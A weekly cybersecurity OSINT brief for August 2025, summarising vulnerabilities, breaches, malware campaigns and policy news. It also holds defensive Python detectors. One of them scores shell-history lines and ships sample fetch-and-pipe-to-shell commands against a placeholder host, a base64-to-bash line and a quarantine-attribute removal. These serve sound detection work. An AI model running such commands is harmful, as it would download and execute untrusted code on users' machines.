Cyber OSINT Overview, Aug 18 - Aug 24, 2025 #
This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.
Most Discussed Topics #
- Multiple vulnerabilities in the Linux Kernel were a primary focus, with numerous advisories detailing flaws that could lead to denial of service, privilege escalation, file manipulation, and other unspecified attacks. These vulnerabilities affected various distributions, including Red Hat Enterprise Linux and Ubuntu. System administrators are urged to review and apply the latest kernel updates to mitigate these widespread risks.
- gov cyber.gc.ca: Red Hat security advisory (AV25-527)
- gov cyber.gc.ca: Ubuntu security advisory (AV25-524)
- gov wid.cert-bund.de: [UPDATE] [high] Linux Kernel: Multiple vulnerabilities
- gov wid.cert-bund.de: [UPDATE] [high] Linux Kernel: Multiple vulnerabilities
- gov wid.cert-bund.de: [NEW] [medium] Linux Kernel: Vulnerability allows denial of service
- gov wid.cert-bund.de: [UPDATE] [high] Linux Kernel: Multiple vulnerabilities
- Phishing and social engineering tactics are evolving with increased sophistication, heavily leveraging AI and impersonation. Attackers are using generative AI to create convincing phishing sites and emails, including HR-impersonation campaigns with high click-through rates. Advanced techniques like ‘quishing’ (QR code phishing) with split or nested codes are being used to bypass security filters, while other campaigns use fake copyright infringement notices and homoglyph URLs to deceive victims.
- vendor blog.barracuda.com: Threat Spotlight: Split and nested QR codes fuel new generation of ‘quishing’ attacks
- vendor blog.knowbe4.com: New Homoglyph Phishing Campaign Impersonates Booking.com
- vendor blog.knowbe4.com: The Attacker’s Playbook: A Technical Analysis of Quishing and Encrypted SVG Payloads Used in HR Impersonation Phishing Attacks
- vendor blog.knowbe4.com: Threat Actors Are Increasingly Abusing Generative AI Tools for Phishing
- vendor morphisec.com: Noodlophile Stealer Evolves: Targeted Copyright Phishing Hits Enterprises with Social Media Footprints
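The homoglyph lure above works because the host name reads as the brand but is not it. The following Python is an added example (not code from KnowBe4, Barracuda or any other source in this brief) of the skeleton check a mail or URL filter can apply: decode punycode labels, strip diacritics, map a small confusables table onto ASCII, and compare the result against protected brands. The confusables subset, the brand list and the sample URLs are constructed for this example; it goes beyond the Booking.com case by also catching digit and multi-letter substitutions such as "paypa1" and "rnicrosoft".

```python
import unicodedata
from urllib.parse import urlsplit

# Subset of the Unicode confusables data (assumption: a production filter would
# load the complete confusables.txt). Each lookalike maps to the ASCII
# character it imitates. Digits are included because "paypa1"-style lures are
# common; drop them if your protected brand names contain digits.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic а
    "\u0435": "e",  # Cyrillic е
    "\u043e": "o",  # Cyrillic о
    "\u0440": "p",  # Cyrillic р
    "\u0441": "c",  # Cyrillic с
    "\u0443": "y",  # Cyrillic у
    "\u0445": "x",  # Cyrillic х
    "\u0456": "i",  # Cyrillic і
    "\u0458": "j",  # Cyrillic ј
    "\u04bb": "h",  # Cyrillic һ
    "\u03bf": "o",  # Greek omicron
    "\u03b1": "a",  # Greek alpha
    "\u0131": "i",  # Latin dotless i
    "\u0261": "g",  # Latin script g
    "0": "o",
    "1": "l",
}
# Runs of ASCII letters that a reader sees as one other letter.
MULTI_CHAR = {"rn": "m", "vv": "w", "cl": "d"}
# Brands to protect (assumption for this example).
PROTECTED_BRANDS = ["booking.com", "paypal.com", "microsoft.com"]


def to_unicode(host: str) -> str:
    """Decode punycode (xn--) labels to Unicode; return non-ASCII hosts unchanged."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def skeleton(host: str) -> str:
    """Reduce a host name to the ASCII string a human would read it as."""
    decomposed = unicodedata.normalize("NFKD", to_unicode(host)).lower()
    # Drop combining marks (e.g. the dot under a decorated letter), then map
    # single-character lookalikes.
    chars = [CONFUSABLES.get(ch, ch) for ch in decomposed if not unicodedata.combining(ch)]
    text = "".join(chars)
    for seq, replacement in MULTI_CHAR.items():
        text = text.replace(seq, replacement)
    return text


def lookalike_of(host: str, brands=PROTECTED_BRANDS):
    """Return the protected brand this host imitates, or None."""
    host = host.lower().rstrip(".")
    if host in brands:
        return None  # the genuine domain, not a lookalike
    sk = skeleton(host)
    for brand in brands:
        if sk == skeleton(brand):
            return brand
    return None


def classify_url(url: str):
    """Extract the host of a URL and report which brand, if any, it imitates."""
    host = urlsplit(url).hostname or ""
    return host, lookalike_of(host)


# Constructed sample URLs: the genuine brand, the Unicode lure, the same lure
# in punycode form, digit and letter-run substitutions, and an unrelated site.
SAMPLE_URLS = [
    "https://booking.com/login",
    "https://b\u043e\u043eking.com/confirm",
    "https://" + "b\u043e\u043eking.com".encode("idna").decode("ascii") + "/confirm",
    "https://paypa1.com/secure",
    "https://rnicrosoft.com/update",
    "https://example.org/booking",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        host, brand = classify_url(url)
        print(f"{host:32s} {'lookalike of ' + brand if brand else 'ok'}")
```

The skeleton is applied to both sides of the comparison, so a brand that itself contains "rn" still matches its genuine domain. The check deliberately ignores the URL path, since the path in these campaigns is usually whatever the real site uses.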
- Vulnerabilities in widely-used web browsers and related components continue to be a major concern, with multiple security advisories released for Google Chrome, Microsoft Edge, and Mozilla Firefox. These flaws could allow a remote attacker to execute arbitrary code, bypass security measures, or cause a denial-of-service condition. The consistent stream of patches highlights the ongoing need for timely browser updates to protect against web-based threats.
- gov cyber.gc.ca: Google Chrome security advisory (AV25-530)
- gov cyber.gc.ca: Microsoft Edge security advisory (AV25-526)
- gov cyber.gc.ca: Microsoft Edge security advisory (AV25-535)
- gov cyber.gc.ca: Mozilla security advisory (AV25-529)
- gov wid.cert-bund.de: [UPDATE] [high] Google Chrome and Microsoft Edge: Multiple vulnerabilities allow code execution
- The use of generative AI in cyber attacks and defense is a rapidly growing area of concern and innovation. Threat actors are leveraging AI to create more sophisticated phishing campaigns, generate malware, and automate attacks at scale. Simultaneously, defenders are exploring AI for threat detection, AIOps, and security automation, though research shows these systems can be subverted through poisoned input data. This dual-use nature of AI makes it a critical topic, with a focus on securing AI systems themselves and defending against AI-powered threats.
- personal schneier.com: Subverting AIOps Systems Through Poisoned Input Data
- vendor blog.barracuda.com: Evil-GPT: The “Enemy of ChatGPT”
- vendor unit42.paloaltonetworks.com: Fashionable Phishing Bait: GenAI on the Hook
- vendor welivesecurity.com: Investors beware: AI-powered financial scams swamp social media
Critical Vulnerabilities #
- Apple has patched an actively exploited zero-day vulnerability, CVE-2025-43300, across iOS, iPadOS, and macOS. This out-of-bounds write flaw in the ImageIO framework allows for memory corruption and potential code execution when processing a malicious image, requiring no user interaction. CISA has added the vulnerability to its KEV catalog, and Apple reports it may have been used in sophisticated, targeted attacks, underscoring the urgency for all users to apply the latest security updates immediately.
- gov cyber.gc.ca: Apple security advisory (AV25-533)
- gov cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- news cyberscoop.com: Apple discloses actively exploited zero-day affecting iOS, iPadOS and macOS
- news therecord.media: CISA warns of Apple zero-day used in targeted cyberattacks
- vendor malwarebytes.com: All Apple users should update after company patches zero-day vulnerability in all platforms
- Multiple critical vulnerabilities in on-premises Microsoft SharePoint Server are being actively exploited for remote code execution. The exploit chain pairs an authentication bypass (CVE-2025-49706, with CVE-2025-53771 covering the bypass of its fix) with deserialization-based remote code execution (CVE-2025-49704, with CVE-2025-53770 covering the bypass of its fix); CVE-2025-49712 is a further SharePoint remote code execution flaw fixed in the August updates. The Canadian Centre for Cyber Security reports exploitation in Canada. Microsoft has released patches for SharePoint Server Subscription Edition, 2019, and 2016; organizations are strongly urged to apply them, rotate the ASP.NET machine keys afterwards (attackers have stolen these to forge authenticated requests), and search for the published indicators of compromise.
- gov cyber.gc.ca: AL25-009 - Vulnerability impacting Microsoft SharePoint Server (CVE-2025-53770, CVE-2025-49704, CVE-2025-53771, CVE-2025-49706 and CVE-2025-49712) – Update 4
- news darkreading.com: How Warlock Ransomware Targets Vulnerable SharePoint Servers
- vendor threats.wiz.io: Warlock Ransomware Exploiting Sharepoint Vulnerabilities (Campaign)
- Trend Micro’s enterprise endpoint security products, including Apex One, are affected by actively exploited OS command injection vulnerabilities (CVE-2025-54948, CVE-2025-54987). These flaws allow a remote, unauthenticated attacker to execute arbitrary code. CISA has added CVE-2025-54948 to its KEV catalog due to confirmed exploitation in the wild. Trend Micro has released a Fixtool and a Critical Patch, and all customers with on-premises Apex One 2019 SP1 should apply the updates immediately.
- gov wid.cert-bund.de: [UPDATE] [critical] Trend Micro Apex One: Vulnerability allows code execution
- gov cisa.gov: CISA Adds One Known Exploited Vulnerability to Catalog
- gov jpcert.or.jp: Alert: Multiple OS command injection vulnerabilities in Trend Micro enterprise endpoint security products (updated)
- Multiple vulnerabilities have been disclosed in Commvault Backup & Recovery, and watchTowr Labs has shown that they can be chained into pre-authentication remote code execution, with proof-of-concept exploits available for several. The flaws as summarized are argument injection (CVE-2025-57788), path traversal (CVE-2025-57789), unauthorized API access (CVE-2025-57790), and a weakness in the initial login process (CVE-2025-57791). Successful exploitation could lead to privilege escalation, remote code execution, and unauthorized access. Administrators should apply the updates provided by Commvault and keep the CommServe web interface off the internet, since backup servers hold credentials for much of the estate.
- community reddit.com: Guess Who Would Be Stupid Enough To Rob The Same Vault Twice? Pre-Auth RCE Chains in Commvault - watchTowr Labs
- gov advisories.ncsc.nl: NCSC-2025-0265 [1.00] [M/H] Vulnerabilities fixed in Commvault
- gov cyber.gc.ca: Commvault security advisory (AV25-531)
- gov wid.cert-bund.de: [UPDATE] [high] Commvault Backup & Recovery: Multiple vulnerabilities
- Cisco has released patches for multiple products, including a maximum-severity remote code execution vulnerability (CVE-2025-20265) in the Secure Firewall Management Center (FMC). The flaw lies in the handling of user input during the RADIUS authentication phase: an unauthenticated, remote attacker can submit crafted credentials that are passed to the configured RADIUS server and have injected shell commands executed with high privileges. Only deployments with RADIUS authentication enabled for the web-based management interface or SSH are affected, and Cisco lists switching to another authentication method (local accounts, external LDAP, or SAML SSO) as a workaround until the fixed release is installed. Other advisories address information disclosure in Evolved Programmable Network Manager (EPNM) and Prime Infrastructure, and an arbitrary file upload vulnerability in the Identity Services Engine (ISE).
- gov cyber.gc.ca: Cisco security advisory (AV25-532)
- gov wid.cert-bund.de: [NEW] [medium] Cisco Identity Services Engine (ISE): Vulnerability allows upload of arbitrary files
- gov wid.cert-bund.de: [NEW] [medium] Cisco EPNM and Prime Infrastructure: Vulnerability allows information disclosure
- vendor arcticwolf.com: CVE-2025-20265: Maximum-Severity Remote Code Execution Vulnerability in Cisco Secure Firewall Management Center
- A critical vulnerability in ProFTPD could allow a remote, unauthenticated attacker to execute arbitrary code with administrator privileges. This flaw poses a significant risk to servers running the popular FTP server software. Administrators are urged to monitor for patches and apply them as soon as they become available to prevent potential full system compromise.
- Multiple vulnerabilities have been reported across a wide range of Industrial Control Systems (ICS) from vendors like Siemens, Mitsubishi Electric, and FUJIFILM. These flaws could lead to privilege escalation, denial of service, or unauthorized access to sensitive information in critical infrastructure sectors. CISA has released several advisories detailing the affected products, including Siemens Desigo CC, Mendix SAML Module, Mitsubishi MELSEC iQ-F Series, and FUJIFILM Synapse Mobility, and urges organizations to apply patches and mitigations.
- gov cisa.gov: CISA Releases Four Industrial Control Systems Advisories
- gov cisa.gov: CISA Releases Three Industrial Control Systems Advisories
- gov cisa.gov: Siemens Desigo CC Product Family and SENTRON Powermanager
- gov cisa.gov: Siemens Mendix SAML Module
- gov cisa.gov: Mitsubishi Electric Corporation MELSEC iQ-F Series CPU Module
- gov cisa.gov: FUJIFILM Healthcare Americas Synapse Mobility
Major Incidents #
- Electronics manufacturer Data I/O has reported a ransomware attack that began on August 16, causing significant disruptions to its operational systems for shipping, manufacturing, and production. The company, which supplies major tech and automotive firms including Tesla and Google, has filed a report with the U.S. SEC, stating the incident is likely to have a material impact on its financial condition. An investigation is underway to determine the extent of potential data exfiltration.
- news therecord.media: Electronics manufacturer Data I/O reports ransomware attack to SEC
- UK telecom provider Colt Technology Services confirmed a cyberattack that caused multi-day outages of its online portals and voice platforms. The WarLock ransomware group has claimed responsibility for the incident, offering to sell one million stolen documents for $200,000. The compromised data allegedly includes sensitive financial, employee, and customer information. Researchers suggest the attackers may have gained entry by exploiting the actively targeted Microsoft SharePoint vulnerability, CVE-2025-53770.
- personal fortra.com: Warlock ransomware: What you need to know
- vendor research.checkpoint.com: 18th August – Threat Intelligence Report
- An unprotected and misconfigured database belonging to Ohio Medical Alliance, which operates as Ohio Marijuana Card, has exposed nearly one million records of medical marijuana patients. The 323 GB database contained highly sensitive PII, including names, Social Security numbers, driver’s license images, and detailed medical files with conditions like PTSD. The data was accessible without a password, but it is currently unknown how long it was exposed or if it was accessed by malicious actors.
- news hackread.com: Nearly 1M SSNs and Health Records Exposed in Marijuana Patient Database
- The Canadian House of Commons experienced a data breach resulting from a vulnerability in Microsoft software. The incident led to unauthorized access to a database containing employee names, office locations, email addresses, and information about government-managed computers and mobile devices. The extent of the breach and the specific vulnerability exploited have not been fully disclosed.
- vendor research.checkpoint.com: 18th August – Threat Intelligence Report
- Russian state-sponsored hackers have reportedly seized control of a Norwegian dam’s floodgate, allowing water to flow unnoticed for four hours. The attack, which occurred in April, is now being attributed to Russia by Norway’s intelligence service. This incident highlights the significant physical risks posed by cyberattacks targeting critical industrial control systems (ICS).
- personal ctoatncsc.substack.com: CTO at NCSC Summary: week ending August 24th
Emerging Threats #
- A new RAT named GodRAT, based on the Gh0st RAT codebase, is being used to target financial firms. Attackers deliver the malware via malicious screensaver files sent through Skype, using steganography to hide shellcode within image files. GodRAT supports plugins, which have been used to deploy file managers and password stealers. The malware is considered an evolution of the AwesomePuppet RAT, previously linked to the Winnti APT group.
- vendor securelist.com: GodRAT – New RAT targeting financial institutions
- The China-affiliated espionage group Silk Typhoon (also known as Murky Panda) has significantly increased its activity, targeting organizations in North America. The group is exploiting both n-day and zero-day vulnerabilities in products like Citrix NetScaler for initial access. A notable tactic is the compromise of cloud solution providers to gain trusted access to downstream customer environments, a sophisticated supply chain attack vector that allows for prolonged, stealthy access.
- news cyberscoop.com: CrowdStrike warns of uptick in Silk Typhoon attacks this summer
- news thecyberexpress.com: China-linked Silk Typhoon Hackers Target SaaS Providers, Zero Days
- A novel clickjacking technique can steal credentials and other sensitive data from browser-extension password managers including 1Password and LastPass. Script on an attacker-controlled page manipulates the page’s DOM so that the extension’s injected autofill prompt becomes invisible (for example by setting its opacity to zero) and sits over a seemingly harmless element such as a cookie banner. When the user clicks the decoy, the click lands on the hidden autofill control and the password manager fills credentials, credit card data, or passkey data into fields the attacker’s page can read. Because the attack runs on the attacker’s own page rather than by framing a victim site, site-side defences such as X-Frame-Options do not help; the fix has to come from the extensions, by checking that their UI is actually visible before acting or by requiring an explicit confirmation step.
- community reddit.com: DOM-based Extension Clickjacking: Your Password Manager Data at Risk (1Password, Bitwarden, Dashlane, Enpass, iCloud Passwords, KeePassXC-Browser, Keeper, LastPass, LogMeOnce, NordPass, Proton Pass, RoboForm / Also crypto wallets, notes, etc. as web browser extensions)
- news thecyberexpress.com: DOM-Based Extension Clickjacking Exposes Millions of Password Manager Users to Credential Theft
- vendor malwarebytes.com: Clickjack attack steals password managers’ secrets
- The PipeMagic backdoor has resurfaced with enhanced capabilities, most recently paired with CVE-2025-29824, a privilege escalation flaw in the Windows Common Log File System (CLFS) driver that was exploited as a zero-day before Microsoft patched it in April 2025. First seen in a 2022 RansomExx campaign, the 2025 attacks target organizations in Brazil and the Middle East. The malware, delivered via a fake ChatGPT client, functions as both a full backdoor and a network gateway and has been observed in Play ransomware attack chains, highlighting its continued evolution and use by sophisticated threat actors.
- news darkreading.com: PipeMagic Backdoor Resurfaces as Part of Play Ransomware Attack Chain
- vendor securelist.com: Evolution of the PipeMagic backdoor: from the RansomExx incident to CVE-2025-29824
- A malvertising campaign by the COOKIE SPIDER group is distributing SHAMOS, a new variant of the AMOS macOS infostealer. Attackers purchase ads that lead to fake help sites, which instruct users to run a malicious one-line command in the Terminal, bypassing Gatekeeper protections. SHAMOS is designed to steal sensitive data, including Keychain contents, browser credentials, and cryptocurrency wallets, and can also deploy additional payloads like a fake Ledger Live app.
- news hackread.com: COOKIE SPIDER’s Malvertising Drops New SHAMOS macOS Malware
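The SHAMOS chain hinges on the victim pasting a one-liner into Terminal. As an added example (not code from CrowdStrike, Hackread or any other source here), the following Python triage script flags the generic shapes such lures take in shell history or EDR command-line telemetry: a download piped to a shell, base64 decoded into a shell, command substitution of a download, and removal of the quarantine attribute that Gatekeeper relies on. The rules and sample lines are constructed for the example and do not reproduce the actual SHAMOS command; the base64 string in the sample is a placeholder, not a working payload.

```python
import re

# Heuristics for "paste this into Terminal" lures (assumption: generic patterns
# covering the ClickFix style of delivery, not a signature for one campaign).
RULES = [
    ("download piped to a shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64 decode piped to a shell",
     # macOS base64 accepts -D as well as -d/--decode
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("shell fed by command substitution of a download",
     re.compile(r"\$\(\s*(curl|wget)\b")),
    ("quarantine attribute removed (Gatekeeper bypass)",
     # xattr -c / -rc clears all attributes; -d com.apple.quarantine removes just that one
     re.compile(r"\bxattr\s+(-r?c|-cr|-r?d\s+com\.apple\.quarantine)\b")),
    ("Gatekeeper assessment disabled",
     re.compile(r"\bspctl\s+--(master|global)-disable\b")),
]


def score_command(command: str):
    """Return the names of every rule the command line matches."""
    return [name for name, pattern in RULES if pattern.search(command)]


def triage(lines):
    """Return (line_number, command, reasons) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = score_command(line)
        if reasons:
            hits.append((number, line.strip(), reasons))
    return hits


# Constructed shell history / EDR command lines: three benign, four lure-shaped.
SAMPLE_HISTORY = [
    "brew update && brew upgrade",
    'echo "UExBQ0VIT0xERVJfTk9UX0FfUEFZTE9BRA==" | base64 -d | bash',
    "curl -fsSL https://example.invalid/fix-mac.sh | sh",
    "xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update",
    'bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "git clone https://github.com/example/repo.git",
    "xattr -l ~/Downloads/archive.zip",
]

if __name__ == "__main__":
    for number, command, reasons in triage(SAMPLE_HISTORY):
        print(f"line {number}: {command}")
        for reason in reasons:
            print(f"    - {reason}")
```

These patterns will also catch legitimate installers that ask for a curl-to-shell command, so they are a triage signal for a human or an EDR rule rather than a block list; the combination of a download, a quarantine-attribute removal and execution of the same path within seconds is the sequence worth alerting on.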
- The Noodlophile Stealer campaign has evolved to use highly targeted spear-phishing emails that impersonate copyright infringement notices, primarily targeting enterprises with a significant Facebook presence. These emails contain specific details like Facebook Page IDs to appear legitimate, luring recipients into clicking malicious links. The campaign now uses legitimate applications vulnerable to DLL side-loading to deliver the enhanced stealer, demonstrating more sophisticated delivery and evasion tactics.
- news darkreading.com: Noodlophile Stealer Hides Behind Bogus Copyright Complaints
- vendor morphisec.com: Noodlophile Stealer Evolves: Targeted Copyright Phishing Hits Enterprises with Social Media Footprints
- A Russian state-sponsored group tracked by Cisco Talos as Static Tundra (assessed to be a sub-cluster of Energetic Bear) has been compromising network devices for over a decade, most recently exploiting the seven-year-old Smart Install vulnerability CVE-2018-0171 in Cisco IOS and IOS XE. The campaign targets unpatched or end-of-life devices in critical infrastructure sectors across North America, Asia, Africa, and Europe to establish long-term persistence and conduct espionage, including exfiltrating device configurations. The FBI and Cisco Talos have issued warnings, urging organizations to patch or, where patching is not possible, to disable Smart Install with the no vstack configuration command and verify that the feature is off.
- news cyberscoop.com: Russian cyber group exploits seven-year-old network vulnerabilities for long-term espionage
- news darkreading.com: FBI, Cisco Warn of Russian Attacks on 7-Year-Old Flaw
- vendor tenable.com: Cybersecurity Snapshot: Industrial Systems in Crosshairs of Russian Hackers, FBI Warns, as MITRE Updates List of Top Hardware Weaknesses
Regulatory and Policy Updates #
- CISA has released updated guidance for the Minimum Elements for a Software Bill of Materials (SBOM) and is seeking public comment until October 3, 2025. This update builds on the 2021 NTIA guidelines and aims to reflect advancements in tooling and implementation. The revised guidance focuses on refining data fields, improving automation support, and standardizing operational practices to make SBOMs more scalable, interoperable, and effective for managing software supply chain risks.
- The U.S. Federal Trade Commission (FTC) has warned American tech companies that complying with foreign laws that weaken encryption or censor speech, such as the EU’s Digital Services Act or the UK’s Online Safety Act, could violate U.S. law. FTC Chair Andrew Ferguson stated that censoring Americans to appease foreign governments could be considered an unfair or deceptive practice under the FTC Act. This move signals a potential conflict between U.S. free speech principles and stricter content moderation and surveillance requirements being enacted abroad.
- A bipartisan bill, the Cybersecurity Hiring Modernization Act, has been introduced in the U.S. House of Representatives to prioritize skills-based hiring over educational degrees for federal cybersecurity jobs. The legislation aims to address the federal cyber workforce shortage by removing potentially outdated degree requirements, thereby broadening the pool of qualified applicants. If passed, the Office of Personnel Management (OPM) would be required to publish changes to qualification requirements and report on the educational backgrounds of new hires.
- news cyberscoop.com: House lawmakers take aim at education requirements for federal cyber jobs
- The French government will mandate the use of Tchap, its secure instant messaging application, for all public sector communications starting September 1st. This directive aims to enhance the security of information shared within government agencies by moving away from less secure, commercial messaging platforms. The widespread deployment of Tchap is intended to protect official conversations and data from potential interception or compromise.
- personal ctoatncsc.substack.com: CTO at NCSC Summary: week ending August 24th
Security Operations #
- The UK’s National Cyber Security Centre (NCSC) has released version 4.0 of its Cyber Assessment Framework (CAF). The updated framework is designed to help operators of essential services and critical national infrastructure improve their cyber resilience against increasing threats. Key changes in CAF v4.0 include new sections on understanding attacker methods, ensuring software supply chain security, enhancing security monitoring and threat hunting, and improved coverage of AI-related cyber risks.
- vendor health-isac.org: Health-ISAC Hacking Healthcare 8-15-2025
- Security researchers at Datadog identified a quiet way to enumerate AWS resources through the Resource Explorer service: its ListResources API call was not recorded in CloudTrail by default, so a principal with the right permissions could inventory an account without producing the management events that detections typically rely on. After being notified, AWS reclassified ListResources as a management event, so it is now logged by default wherever a trail or CloudTrail Lake event data store covers the region. Teams should still confirm the call shows up in their own trails and review which principals hold resource-explorer-2 permissions.
- community reddit.com: Enumerating AWS the quiet way: CloudTrail-free discovery with Resource Explorer | Datadog Security Labs
- vendor securitylabs.datadoghq.com: Enumerating AWS the quiet way: CloudTrail-free discovery with Resource Explorer
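As an added example (not Datadog’s code), the following Python shows the detection that becomes possible once ListResources is a management event: it parses a CloudTrail log file, groups Resource Explorer enumeration calls by principal, alerts on bursts from principals outside an allowlist, and reports any such calls that were recorded only as data events, which is how the gap would have looked before the reclassification. The allowlisted role ARN, the thresholds and the sample records are constructed assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

ENUM_SOURCE = "resource-explorer-2.amazonaws.com"
# Read-only Resource Explorer calls that reveal what exists in an account.
ENUM_CALLS = {"ListResources", "Search", "ListIndexes", "ListViews"}
# Principals that legitimately sweep the estate (assumption: an inventory tooling role).
ALLOWED_PRINCIPALS = {"arn:aws:sts::111122223333:assumed-role/InventoryTooling/asset-scan"}
WINDOW = timedelta(minutes=10)   # alert when THRESHOLD calls fall inside WINDOW
THRESHOLD = 3


def parse_trail(raw: str):
    """CloudTrail log files are JSON objects with a top-level 'Records' list."""
    return json.loads(raw)["Records"]


def is_enumeration(event) -> bool:
    return event.get("eventSource") == ENUM_SOURCE and event.get("eventName") in ENUM_CALLS


def _when(event) -> datetime:
    return datetime.fromisoformat(event["eventTime"].replace("Z", "+00:00"))


def find_quiet_enumeration(records):
    """Return (principal, total_calls, first_seen, last_seen) for every principal
    outside the allowlist that made THRESHOLD or more enumeration calls within WINDOW."""
    calls = defaultdict(list)
    for event in records:
        if not is_enumeration(event):
            continue
        principal = event.get("userIdentity", {}).get("arn", "unknown")
        if principal in ALLOWED_PRINCIPALS:
            continue
        calls[principal].append(_when(event))

    alerts = []
    for principal, times in calls.items():
        times.sort()
        start = 0
        for end in range(len(times)):       # sliding window over sorted timestamps
            while times[end] - times[start] > WINDOW:
                start += 1
            if end - start + 1 >= THRESHOLD:
                alerts.append((principal, len(times), times[0], times[-1]))
                break
    return alerts


def coverage_gap(records):
    """Names of enumeration calls recorded only as data events: a default trail
    (management events only) would never have shown these."""
    return sorted({e["eventName"] for e in records
                   if is_enumeration(e) and not e.get("managementEvent", False)})


def _record(time, name, arn, source=ENUM_SOURCE, management=True):
    return {
        "eventVersion": "1.09", "eventTime": time, "eventSource": source, "eventName": name,
        "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "AssumedRole", "arn": arn},
        "managementEvent": management,
        "eventCategory": "Management" if management else "Data",
    }


DEV = "arn:aws:sts::111122223333:assumed-role/Developer/jdoe"
SCAN = "arn:aws:sts::111122223333:assumed-role/InventoryTooling/asset-scan"

# Constructed log file: a developer role sweeping the account within two minutes
# (one call shaped like the pre-reclassification data-event record), the inventory
# role doing its scheduled search, and unrelated EC2 noise.
SAMPLE_TRAIL = json.dumps({"Records": [
    _record("2025-08-20T14:00:05Z", "ListIndexes", DEV),
    _record("2025-08-20T14:00:09Z", "ListResources", DEV),
    _record("2025-08-20T14:00:20Z", "ListResources", DEV, management=False),
    _record("2025-08-20T14:00:40Z", "ListResources", DEV),
    _record("2025-08-20T14:01:58Z", "Search", DEV),
    _record("2025-08-20T14:05:00Z", "Search", SCAN),
    _record("2025-08-20T14:06:00Z", "DescribeInstances", DEV, source="ec2.amazonaws.com"),
]})

if __name__ == "__main__":
    records = parse_trail(SAMPLE_TRAIL)
    for principal, count, first, last in find_quiet_enumeration(records):
        print(f"ALERT {principal}: {count} Resource Explorer calls between {first} and {last}")
    print("enumeration calls logged only as data events:", coverage_gap(records))
```

The allowlist is what keeps this rule quiet in practice: inventory and CSPM tooling will call Search and ListResources constantly, so the signal is a human or workload principal doing it in a burst, ideally correlated with a new access key or an unusual source IP.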
- U.S. government agencies including CISA, DARPA, and the NSA are calling for collaboration with software analysis experts to shape research priorities and address the national gap in software understanding. This initiative aims to maintain a sustained focus on improving tools and methods for analyzing software to identify vulnerabilities and mitigate risks. The effort highlights a high-level strategic push to strengthen the software supply chain and national cybersecurity posture through focused research and development.
- personal ctoatncsc.substack.com: CTO at NCSC Summary: week ending August 24th
- The automotive industry is increasing its focus on software supply chain security, particularly with the proliferation of AI in connected vehicles. The Automotive ISAC (Auto-ISAC) has partnered with Manifest and FESCARO to advance vehicle cybersecurity. This collaboration emphasizes the need for managing AI dependencies, automating Software Bill of Materials (SBOM) workflows, and complying with global regulations like UNECE R155 and the European Cyber Resilience Act (CRA).
- gov automotiveisac.com: Auto-ISAC Partners with Manifest & FESCARO
Wins #
- An Interpol-led crackdown, ‘Operation Serengeti 2.0,’ has dismantled extensive cybercrime and fraud networks across Africa. The three-month operation resulted in the arrest of over 1,200 suspects, the recovery of nearly $97.4 million, and the disruption of over 11,400 malicious infrastructures. Key successes include shutting down illegal cryptocurrency mining centers in Angola and breaking up a massive investment fraud scheme in Zambia, highlighting a major international law enforcement victory against organized cybercrime.
- news cyberscoop.com: Interpol-led crackdown disrupts cybercrime networks in Africa that caused $485 million in losses
- news thecyberexpress.com: African Authorities Arrest 1,200 People, Seize Millions in Massive Cybercrime and Fraud Networks’ Bust
- news therecord.media: Over 1,200 arrested in Africa-wide cybercrime crackdown, Interpol says
- A core member of the notorious Scattered Spider cybercrime group, Noah Michael Urban, has been sentenced to 10 years in federal prison. The 20-year-old pleaded guilty to wire fraud and identity theft charges related to SIM-swapping attacks that stole over $800,000 in cryptocurrency and phishing campaigns that compromised more than 130 major companies. This conviction marks a significant win for law enforcement in dismantling a prolific and highly effective cybercrime operation known for its social engineering prowess.
- news cyberscoop.com: Florida man gets 10 years in prison in first Scattered Spider sentencing
- news hackread.com: Scattered Spider Hacker Noah Michael Urban Jailed for 10 Years
- personal krebsonsecurity.com: SIM-Swapper, Scattered Spider Hacker Gets 10 Years
- U.S. authorities have successfully disrupted the ‘Rapper Bot’ DDoS botnet, one of the most powerful on record, and charged its alleged lead developer and administrator. The botnet, which infected tens of thousands of IoT devices, was capable of launching attacks exceeding 6 terabits per second and was used in over 370,000 attacks against victims in 80 countries. After serving a warrant, the operator terminated the botnet’s attack capabilities and transferred administrative control to law enforcement.
- news cyberscoop.com: Officials gain control of Rapper Bot DDoS botnet, charge lead developer and administrator
- personal krebsonsecurity.com: Oregon Man Charged in ‘Rapper Bot’ DDoS Service
- A Chinese national, Davis Lu, has been sentenced to four years in prison for intentionally sabotaging his employer’s computer systems. After his role was reduced, Lu wrote and deployed malicious code that caused system crashes and installed a ‘kill switch’ to lock users out if his credentials were disabled. The kill switch was activated when he was terminated, impacting thousands of users globally and resulting in significant financial losses for the Ohio-based company.
- news therecord.media: Chinese national who sabotaged Ohio company’s systems handed four-year jail stint
Disclaimer #
The summaries in this brief are generated autonomously by an LLM based on provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
The brief is created in collaboration with BlackStork and is based on a free template.
Reach out if you have questions or suggestions.